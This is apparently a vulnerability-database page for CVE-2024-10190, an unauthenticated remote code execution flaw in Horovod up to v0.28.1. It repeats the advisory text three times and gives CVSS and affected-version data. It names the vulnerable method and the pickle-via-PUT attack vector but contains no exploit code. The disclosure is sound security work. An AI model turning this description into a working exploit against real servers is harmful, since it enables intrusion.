CVE-2024-10190
published 2025-03-20CVE-2024-10190: Horovod versions up to and including v0.28.1 are vulnerable to unauthenticated remote code execution. The vulnerability is due to improper handling of…
PriorityP266critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EPSS
1.02%
59.1th percentile
Horovod versions up to and including v0.28.1 are vulnerable to unauthenticated remote code execution. The vulnerability is due to improper handling of base64-encoded data in the `ElasticRendezvousHandler`, a subclass of `KVStoreHandler`. Specifically, the `_put_value` method in `ElasticRendezvousHandler` calls `codec.loads_base64(value)`, which eventually invokes `cloudpickle.loads(decoded)`. This allows an attacker to send a malicious pickle object via a PUT request, leading to arbitrary code execution on the server.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| horovod | horovod | <= 0.28.1 | — |
| horovod | horovod | 0 – 0.28.1 | — |
| horovod | horovod_horovod | unspecified – latest | — |
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
Horovod Vulnerable to Command Injection
osv·2025-03-20
CVE-2024-10190 [CRITICAL] Horovod Vulnerable to Command Injection
Horovod Vulnerable to Command Injection
Horovod versions up to and including v0.28.1 are vulnerable to unauthenticated remote code execution. The vulnerability is due to improper handling of base64-encoded data in the `ElasticRendezvousHandler`, a subclass of `KVStoreHandler`. Specifically, the `_put_value` method in `ElasticRendezvousHandler` calls `codec.loads_base64(value)`, which eventually invokes `cloudpickle.loads(decoded)`. This allows an attacker to send a malicious pickle object via a PUT request, leading to arbitrary code execution on the server.
GHSA
Horovod Vulnerable to Command Injection
ghsa·2025-03-20
CVE-2024-10190 [CRITICAL] CWE-502 Horovod Vulnerable to Command Injection
Horovod Vulnerable to Command Injection
Horovod versions up to and including v0.28.1 are vulnerable to unauthenticated remote code execution. The vulnerability is due to improper handling of base64-encoded data in the `ElasticRendezvousHandler`, a subclass of `KVStoreHandler`. Specifically, the `_put_value` method in `ElasticRendezvousHandler` calls `codec.loads_base64(value)`, which eventually invokes `cloudpickle.loads(decoded)`. This allows an attacker to send a malicious pickle object via a PUT request, leading to arbitrary code execution on the server.
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.
2025-03-20
Published